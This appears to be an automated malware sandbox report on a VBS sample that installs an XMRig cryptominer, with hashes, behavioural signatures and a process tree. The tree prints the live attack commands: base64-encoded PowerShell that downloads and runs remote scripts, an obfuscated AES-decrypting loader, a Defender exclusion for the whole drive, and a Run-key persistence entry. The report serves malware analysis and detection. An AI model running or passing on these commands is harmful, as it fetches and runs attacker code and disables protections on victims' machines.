Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
59s -
max time network
52s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20250128-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20250128-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
31/01/2025, 01:38
Static task
static1
Behavioral task
behavioral1
Sample
sample.vbs
Resource
win10v2004-20241007-en
Behavioral task
behavioral2
Sample
sample.vbs
Resource
win10ltsc2021-20250128-en
General
-
Target
sample.vbs
-
Size
12.7MB
-
MD5
f7650386857dd0d31fb2a1e984dfd3b5
-
SHA1
f273746309e4dff543059ec934895108dd2b6244
-
SHA256
acdcc9515147f1691ddb2c7cbd352a67ef6f0e57cb72ea593df2bd2fe01f0509
-
SHA512
e8421e56ed514f38780d4c4d3261810c3b7374c3afad7016de0ef50905dba12d2661206162865da93ada5eeb733d9ed985fd2a4f205ee248a2ca3a3fa5607616
-
SSDEEP
49152:BnxqEP6D/zp8K91y5+30k5xTZq+4+EtVGnKTSB4IpQsBtK+gvA9hZKwPBdko9cgD:C
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 2336 created 3596 2336 powershell.exe 57 PID 2336 created 3596 2336 powershell.exe 57 -
Xmrig family
-
XMRig Miner payload 1 IoCs
resource yara_rule behavioral2/memory/1904-77-0x00007FF7D23E0000-0x00007FF7D2C20000-memory.dmp xmrig -
Blocklisted process makes network request 2 IoCs
flow pid Process 2 1732 powershell.exe 5 2336 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 1732 powershell.exe 1508 powershell.exe 2336 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2994328021-2832906384-2448483822-1000\Control Panel\International\Geo\Nation WScript.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2994328021-2832906384-2448483822-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "C:\\Users\\Admin\\dwm.bat" reg.exe -
Power Settings 1 TTPs 5 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 4460 powercfg.exe 3592 powercfg.exe 1944 powercfg.exe 4636 cmd.exe 4820 powercfg.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2336 set thread context of 1904 2336 powershell.exe 104 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Kills process with taskkill 1 IoCs
pid Process 880 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 28 IoCs
pid Process 1732 powershell.exe 1732 powershell.exe 1508 powershell.exe 1508 powershell.exe 2336 powershell.exe 2336 powershell.exe 2336 powershell.exe 2336 powershell.exe 2336 powershell.exe 2336 powershell.exe 1904 explorer.exe 1904 explorer.exe 1904 explorer.exe 1904 explorer.exe 1904 explorer.exe 1904 explorer.exe 1904 explorer.exe 1904 explorer.exe 1904 explorer.exe 1904 explorer.exe 1904 explorer.exe 1904 explorer.exe 1904 explorer.exe 1904 explorer.exe 1904 explorer.exe 1904 explorer.exe 1904 explorer.exe 1904 explorer.exe -
Suspicious use of AdjustPrivilegeToken 35 IoCs
description pid Process Token: SeDebugPrivilege 1732 powershell.exe Token: SeDebugPrivilege 1508 powershell.exe Token: SeIncreaseQuotaPrivilege 1508 powershell.exe Token: SeSecurityPrivilege 1508 powershell.exe Token: SeTakeOwnershipPrivilege 1508 powershell.exe Token: SeLoadDriverPrivilege 1508 powershell.exe Token: SeSystemProfilePrivilege 1508 powershell.exe Token: SeSystemtimePrivilege 1508 powershell.exe Token: SeProfSingleProcessPrivilege 1508 powershell.exe Token: SeIncBasePriorityPrivilege 1508 powershell.exe Token: SeCreatePagefilePrivilege 1508 powershell.exe Token: SeBackupPrivilege 1508 powershell.exe Token: SeRestorePrivilege 1508 powershell.exe Token: SeShutdownPrivilege 1508 powershell.exe Token: SeDebugPrivilege 1508 powershell.exe Token: SeSystemEnvironmentPrivilege 1508 powershell.exe Token: SeRemoteShutdownPrivilege 1508 powershell.exe Token: SeUndockPrivilege 1508 powershell.exe Token: SeManageVolumePrivilege 1508 powershell.exe Token: 33 1508 powershell.exe Token: 34 1508 powershell.exe Token: 35 1508 powershell.exe Token: 36 1508 powershell.exe Token: SeDebugPrivilege 880 taskkill.exe Token: SeDebugPrivilege 2336 powershell.exe Token: SeShutdownPrivilege 4820 powercfg.exe Token: SeCreatePagefilePrivilege 4820 powercfg.exe Token: SeShutdownPrivilege 4460 powercfg.exe Token: SeCreatePagefilePrivilege 4460 powercfg.exe Token: SeLockMemoryPrivilege 1904 explorer.exe Token: SeLockMemoryPrivilege 1904 explorer.exe Token: SeShutdownPrivilege 3592 powercfg.exe Token: SeCreatePagefilePrivilege 3592 powercfg.exe Token: SeShutdownPrivilege 1944 powercfg.exe Token: SeCreatePagefilePrivilege 1944 powercfg.exe -
Suspicious use of WriteProcessMemory 25 IoCs
description pid Process procid_target PID 3792 wrote to memory of 3984 3792 WScript.exe 83 PID 3792 wrote to memory of 3984 3792 WScript.exe 83 PID 3984 wrote to memory of 3260 3984 cmd.exe 85 PID 3984 wrote to memory of 3260 3984 cmd.exe 85 PID 3260 wrote to memory of 1732 3260 cmd.exe 87 PID 3260 wrote to memory of 1732 3260 cmd.exe 87 PID 1732 wrote to memory of 4600 1732 powershell.exe 89 PID 1732 wrote to memory of 4600 1732 powershell.exe 89 PID 4600 wrote to memory of 4340 4600 csc.exe 90 PID 4600 wrote to memory of 4340 4600 csc.exe 90 PID 1732 wrote to memory of 4572 1732 powershell.exe 91 PID 1732 wrote to memory of 4572 1732 powershell.exe 91 PID 3260 wrote to memory of 60 3260 cmd.exe 98 PID 3260 wrote to memory of 60 3260 cmd.exe 98 PID 3260 wrote to memory of 2336 3260 cmd.exe 99 PID 3260 wrote to memory of 2336 3260 cmd.exe 99 PID 4636 wrote to memory of 4820 4636 cmd.exe 103 PID 4636 wrote to memory of 4820 4636 cmd.exe 103 PID 2336 wrote to memory of 1904 2336 powershell.exe 104 PID 4636 wrote to memory of 4460 4636 cmd.exe 105 PID 4636 wrote to memory of 4460 4636 cmd.exe 105 PID 4636 wrote to memory of 3592 4636 cmd.exe 106 PID 4636 wrote to memory of 3592 4636 cmd.exe 106 PID 4636 wrote to memory of 1944 4636 cmd.exe 107 PID 4636 wrote to memory of 1944 4636 cmd.exe 107
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3596
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\sample.vbs"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3792 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\c.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:3984 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\c.bat"4⤵
- Suspicious use of WriteProcessMemory
PID:3260 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -noprofile -windowStyle Hidden -ep bypass -command "Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aWV4IChJbnZva2UtV2ViUmVxdWVzdCAtVXJpICJodHRwczovLzB4MC5zdC84WDVULnBzMSIp')))"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1732 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\osltg2f4\osltg2f4.cmdline"6⤵
- Suspicious use of WriteProcessMemory
PID:4600 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA633.tmp" "c:\Users\Admin\AppData\Local\Temp\osltg2f4\CSCD90FF0FD210941DBBE49B25FDA6C82F.TMP"7⤵PID:4340
-
-
-
C:\windows\system32\cmstp.exe"C:\windows\system32\cmstp.exe" /au C:\windows\temp\e2qjqc4z.inf6⤵PID:4572
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "dwm" /t REG_SZ /d "C:\Users\Admin\dwm.bat" /f5⤵
- Adds Run key to start application
PID:60
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hiDDen -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3T2k4dk1UVTJMakkxTXk0eU5UQXVOakk2TlRBd01DOWtiM2R1Ykc5aFpDOUhaVzVsY21GMFpXUlRZM0pwY0hRdWNITXhJaWs9JykpKTtlbXB0eXNlcnZpY2VzIC1ldHc7U3RhcnQtU2xlZXAgLVNlY29uZHMgMTA7ZnVuY3Rpb24gZ2VjdGltY2RnYmpsb2x6a2lxcmptaGN0aHhxeHpnbW51ZWtiaW5hbigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0JFMEw2aUN3N3crTnBhVzcwNktsZ01UN3pxMkZHYXlReFkrWElkaHA4SEE9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OignZ25pcnRTNDZlc2FCbW9yRidbLTEuLi0xNl0gLWpvaW4gJycpKCdmNGV6a1NJa2RhN1Ewcmk5R2VtSVF3PT0nKTsJJGRlY3J5cHRvcl92YXI9JGFlc192YXIuQ3JlYXRlRGVjcnlwdG9yKCk7CSRyZXR1cm5fdmFyPSRkZWNyeXB0b3JfdmFyLlRyYW5zZm9ybUZpbmFsQmxvY2soJHBhcmFtX3ZhciwgMCwgJHBhcmFtX3Zhci5MZW5ndGgpOwkkZGVjcnlwdG9yX3Zhci5EaXNwb3NlKCk7CSRhZXNfdmFyLkRpc3Bvc2UoKTsJJHJldHVybl92YXI7fWZ1bmN0aW9uIGZqbXNjcXVhYmZ3b2NjYXpjaW1rdmVlenB3cmtheGN2cWRkZHZrcXIoJHBhcmFtX3Zhcil7CUlFWCAnJGRwd3RreGtyZWx6emFxc2FmbWRneWt6ZGQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFBQUJCQkNDQ2VtQUFBQkJCQ0NDb3JBQUFCQkJDQ0N5U0FBQUJCQkNDQ3RyQUFBQkJCQ0NDZWFBQUFCQkJDQ0NtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FBQUJCQkNDQycsICcnKTsJSUVYICckYXl6eXhkcnN1Z2dpa3BybHpmcHljdWFsZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5BQUFCQkJDQ0NNQUFBQkJCQ0NDZUFBQUJCQkNDQ21BQUFCQkJDQ0NvQUFBQkJCQ0NDckFBQUJCQkNDQ3lBQUFCQkJDQ0NTQUFBQkJCQ0NDdEFBQUJCQkNDQ3JBQUFCQkJDQ0NlQUFBQkJCQ0NDYUFBQUJCQkNDQ21BQUFCQkJDQ0M7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7CUlFWCAnJHhqaGt0dHB0cWp6bHRoaGhoZ2psc3Z3bHU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FBQUJCQkNDQ29tQUFBQkJCQ0NDcHJBQUFCQkJDQ0NlQUFBQkJCQ0NDc3NBQUFCQkJDQ0Npb0FBQUJCQkNDQ24uQUFBQkJCQ0NDR1pBQUFCQkJDQ0NpcEFBQUJCQkNDQ1N0QUFBQkJCQ0NDcmVBQUFCQkJDQ0NhbUFBQUJCQkNDQygkZHB3dGt4a3JlbHp6YXFzYWZtZGd5a3pkZCwgW0lPLkNBQUFCQkJDQ0NvbUFBQUJCQkNDQ3ByQUFBQkJCQ0NDZXNBQUFCQkJDQ0NzaUFBQUJCQkNDQ29uQUFBQkJCQ0NDLkNvQUFBQkJCQ0NDbXBBQUFCQkJDQ0NyZUFBQUJCQkNDQ3NzQUFBQkJCQ0NDaUFBQUJCQkNDQ29BQUFCQkJDQ0NuQUFBQkJCQ0NDTW9kZV06OkRBQUFCQkJDQ0NlQUFBQkJCQ0NDY0FBQUJCQkNDQ29tcEFBQUJCQkNDQ3JlQUFBQkJCQ0NDc3MpOycuUmVwbGFjZSgnQUFBQkJCQ0NDJywgJycpOwkkeGpoa3R0cHRxanpsdGhoaGhnamxzdndsdS5Db3B5VG8oJGF5enl4ZHJzdWdnaWtwcmx6ZnB5Y3VhbGQpOwkkeGpoa3R0cHRxanpsdGhoaGhnamxzdndsdS5EaXNwb3NlKCk7CSRkcHd0a3hrcmVsenphcXNhZm1kZ3lremRkLkRpc3Bvc2UoKTsJJGF5enl4ZHJzdWdnaWtwcmx6ZnB5Y3VhbGQuRGlzcG9zZSgpOwkkYXl6eXhkcnN1Z2dpa3BybHpmcHljdWFsZC5Ub0FycmF5KCk7fWZ1bmN0aW9uIGFhd2ZqaGN5cG1yZ2ZzcWdraGlhaG5zdG1iam1hcWZmdGxuKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewkJSUVYICckeWZrZWFmeW91enVraWJucXB0Z3NhZnhpcXZvcXpsYm12cHVuZm9xZD1bU3lzdGVtLlJBQUFCQkJDQ0NlQUFBQkJCQ0NDZmxBQUFCQkJDQ0NlY3RBQUFCQkJDQ0Npb0FBQUJCQkNDQ24uQUFBQkJCQ0NDQXNBQUFCQkJDQ0NzZUFBQUJCQkNDQ21iQUFBQkJCQ0NDbEFBQUJCQkNDQ3lBQUFCQkJDQ0NdOjpMQUFBQkJCQ0NDb0FBQUJCQkNDQ2FBQUFCQkJDQ0NkQUFBQkJCQ0NDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7CUlFWCAnJGF4eWhueHpmdnZjYnF0dXNoYm5lcmhvanlob3NoemthZGNyY2hwdXN3anVkaWF3Y3ZiPSR5ZmtlYWZ5b3V6dWtpYm5xcHRnc2FmeGlxdm9xemxibXZwdW5mb3FkLkFBQUJCQkNDQ0VBQUFCQkJDQ0NuQUFBQkJCQ0NDdEFBQUJCQkNDQ3JBQUFCQkJDQ0N5QUFBQkJCQ0NDUEFBQUJCQkNDQ29BQUFCQkJDQ0NpQUFBQkJCQ0NDbkFBQUJCQkNDQ3RBQUFCQkJDQ0M7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7CUlFWCAnJGF4eWhueHpmdnZjYnF0dXNoYm5lcmhvanlob3NoemthZGNyY2hwdXN3anVkaWF3Y3ZiLkFBQUJCQkNDQ0lBQUFCQkJDQ0NuQUFBQkJCQ0NDdkFBQUJCQkNDQ29BQUFCQkJDQ0NrQUFBQkJCQ0NDZUFBQUJCQkNDQygkbnVsbCwgJHBhcmFtMl92YXIpOycuUmVwbGFjZSgnQUFBQkJCQ0NDJywgJycpO30kbHpwaWprZmVjcGJtdnBsdnVybnlhYWlsbSA9ICRlbnY6VVNFUk5BTUU7JG5lYnBrbnZqa2Fmb2N4eHh2Y2d2cnZld3kgPSAnQzpcVXNlcnNcJyArICRsenBpamtmZWNwYm12cGx2dXJueWFhaWxtICsgJ0FBQUJCQkNDQ1xBQUFCQkJDQ0NkQUFBQkJCQ0NDd0FBQUJCQkNDQ21BQUFCQkJDQ0MuQUFBQkJCQ0NDYkFBQUJCQkNDQ2FBQUFCQkJDQ0N0QUFBQkJCQ0NDJy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbmVicGtudmprYWZvY3h4eHZjZ3ZydmV3eTskcHdkbWo9W1N5c3RlbS5JTy5GaWxlXTo6KCd0eGVUbGxBZGFlUidbLTEuLi0xMV0gLWpvaW4gJycpKCRuZWJwa252amthZm9jeHh4dmNndnJ2ZXd5KS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkcXJ3IGluICRwd2RtaikgewlpZiAoJHFydy5TdGFydHNXaXRoKCc6OicpKQl7CQkkcmFmcXY9JHFydy5TdWJzdHJpbmcoMik7CQlicmVhazsJfX0kYWZ4YWRhaGt6cnJocmx1bmFtYmlyZG90endkcWN0dGpwZ249W3N0cmluZ1tdXSRyYWZxdi5TcGxpdCgnXCcpO0lFWCAnJGZmdWFwZ3ltYW5uYXlnYWdtaWhjeHFlYmh3cWhmeWhza3lvPWZqbXNjcXVhYmZ3b2NjYXpjaW1rdmVlenB3cmtheGN2cWRkZHZrcXIgKGdlY3RpbWNkZ2JqbG9semtpcXJqbWhjdGh4cXh6Z21udWVrYmluYW4gKFtBQUFCQkJDQ0NDQUFBQkJCQ0NDb0FBQUJCQkNDQ25BQUFCQkJDQ0N2QUFBQkJCQ0NDZUFBQUJCQkNDQ3J0XTo6QUFBQkJCQ0NDRkFBQUJCQkNDQ3JBQUFCQkJDQ0NvQUFBQkJCQ0NDbUFBQUJCQkNDQ0JBQUFCQkJDQ0NhQUFBQkJCQ0NDc2U2QUFBQkJCQ0NDNEFBQUJCQkNDQ1NBQUFCQkJDQ0N0QUFBQkJCQ0NDcmlBQUFCQkJDQ0NuQUFBQkJCQ0NDZ0FBQUJCQkNDQygkYWZ4YWRhaGt6cnJocmx1bmFtYmlyZG90endkcWN0dGpwZ25bMF0pKSk7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7SUVYICckaWdsbWJzcW9nbHZma2NuaGJoZHBvYXNzc3BxaGNmdnB6cnI9Zmptc2NxdWFiZndvY2NhemNpbWt2ZWV6cHdya2F4Y3ZxZGRkdmtxciAoZ2VjdGltY2RnYmpsb2x6a2lxcmptaGN0aHhxeHpnbW51ZWtiaW5hbiAoW0FBQUJCQkNDQ0NBQUFCQkJDQ0NvQUFBQkJCQ0NDbkFBQUJCQkNDQ3ZBQUFCQkJDQ0NlQUFBQkJCQ0NDckFBQUJCQkNDQ3RdOjpBQUFCQkJDQ0NGQUFBQkJCQ0NDckFBQUJCQkNDQ29BQUFCQkJDQ0NtQUFBQkJCQ0NDQkFBQUJCQkNDQ2FBQUFCQkJDQ0NzQUFBQkJCQ0NDZUFBQUJCQkNDQzZBQUFCQkJDQ0M0QUFBQkJCQ0NDU0FBQUJCQkNDQ3RyQUFBQkJCQ0NDaUFBQUJCQkNDQ25BQUFCQkJDQ0NnKCRhZnhhZGFoa3pycmhybHVuYW1iaXJkb3R6d2RxY3R0anBnblsxXSkpKTsnLlJlcGxhY2UoJ0FBQUJCQkNDQycsICcnKTthYXdmamhjeXBtcmdmc3Fna2hpYWhuc3RtYmptYXFmZnRsbiAkZmZ1YXBneW1hbm5heWdhZ21paGN4cWViaHdxaGZ5aHNreW8gJG51bGw7YWF3ZmpoY3lwbXJnZnNxZ2toaWFobnN0bWJqbWFxZmZ0bG4gJGlnbG1ic3FvZ2x2ZmtjbmhiaGRwb2Fzc3NwcWhjZnZwenJyICgsW3N0cmluZ1tdXSAoJyVBQUFCQkJDQ0MnKSk7')) | Invoke-Expression"5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2336
-
-
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of WriteProcessMemory
PID:4636 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4820
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4460
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3592
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1944
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1904
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath C:\ -ExclusionProcess powershell.exe1⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1508
-
C:\Windows\system32\taskkill.exetaskkill /IM cmstp.exe /F1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:880
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD53eb3833f769dd890afc295b977eab4b4
SHA1e857649b037939602c72ad003e5d3698695f436f
SHA256c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485
SHA512c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72
-
Filesize
1KB
MD539ad01207ab66ca033816b2ad1adbb9e
SHA10fc7a5bba6583a49e22587f43013fa17bab612e3
SHA25647fc0e0ca67b16f3b165a4ac3b5bb899c65e693ea3f604e4f4d9b64ac0300c11
SHA5125efbb3c7cccdf3233bb42e214d09b56df7d5c7f3178b0f5cf1ac90a609a381d201d826cd3cda8d17e10bbcb4207a0563bfcad72ac2564fdc62383588e77f493b
-
Filesize
1KB
MD531acf67f660e89987560231ed0b3c3b3
SHA1620fe347c4409ef13a071716f0c9c99f681cb702
SHA25615523897d0bcc243b61d494a17fd403dd2db23e84d3701c49f2381e7e7d56ea0
SHA512e50e97fce229e053682c9f60e4a76e7072a0ce4c9fe7211f66b96d87c910c128b0e301817a48817e86dd0c0e9c52e155243fbd8f79d015341abc49fac39fb12e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
12.7MB
MD57a1c7d3da7cf792dda3fcb171347daa1
SHA1fb4f7291f1e8c2d807f34e2e43f2bfa343f219a1
SHA256f03344def4aff1dafd24bd5a4e5c6e505a92a1c30c6bf3d11de9fea8cf187a39
SHA512bf3372f65d5019d08804ac0a5d2df16a25e7d11670f2bfdd332ca83d4e34fae5ca752a34b3158e1bafda34e018a3a4d0dcc64fbf6cff6326fa2ea916d4d44d21
-
Filesize
4KB
MD57e02ad525aabf88486d3cedbb7365da2
SHA130fb32c13aeae64d0148c51c51931ea408b2dd93
SHA2565175bea7fd9c3753997e908bbbc6ce155482b2d681b20c15e147a610c20ef05e
SHA512801256e59ccefb246e8a8c5abfc2ef7e5d72f0ebc90703291c61c04f975af53b38a9021d63395db6b98cb4291bed7f10790a71fa669cfc3e990398afeb7c8a7a
-
Filesize
667B
MD505662b83ff7db6317e391454787598d8
SHA1d290d661e282eb757a5292fe5ee8f2f8517232ab
SHA2560322b78214d9fb1d40d9bf162a44f9a5fe13fcb21c96b8b0f0e289e939a9fa5c
SHA512f1b302c58804c79e350cd2f30a2f08f762551cc8790ed3f0b877efd8915996587734afe9f0b4185cfbbcf589aa9b04762dd80d9d8141a5bf647de692299161e9
-
Filesize
652B
MD57bab585262f358be0f923e26388aa2ed
SHA1c48304c5267a012e259c8f001754eb0873c29a53
SHA256633e4aee3f1508c41d639c6fb7f24d25c5365e531aa033118227b3e8be88f111
SHA512311738d757a4c31e328aa3cf3a5772d0024a5c25e8c466f243db000709475489a6e3665dc785a1754b1451ed84ce064419d24bd417bcc0c741e0a36ef4066d60
-
Filesize
2KB
MD5b126ac3da39ffa35cb857267cbc70cbb
SHA159dbfa9af3f2fa2c3bda0118ef779c0238675721
SHA2566e6dd39153a84b94b4f309a4c4521260cbdd8a6922ade46096f42da39bc20b93
SHA512c15d8ef56529792b983d55736c283ad6ae5c95bcd661053292f95c51f535109e4c59cf391e1c724be97e52ee4bfa213a380021f51c4e576201c03cfc4647acbc
-
Filesize
369B
MD5b151668ed608523cab531efbf73de4fe
SHA118ae84ca823013a21fbf764e24e921960729ffb4
SHA256773e74283b66b9de30848080f3afd75c163bd71f0d7c828923740c6913973cb2
SHA5121801d72f09fc50e6864fd28901c815a273937d300028ef3f542f11820b7e2fa3ad09580650c992eed2191378dcb2b656cfb9cf86f882305ecf59410cd544bce8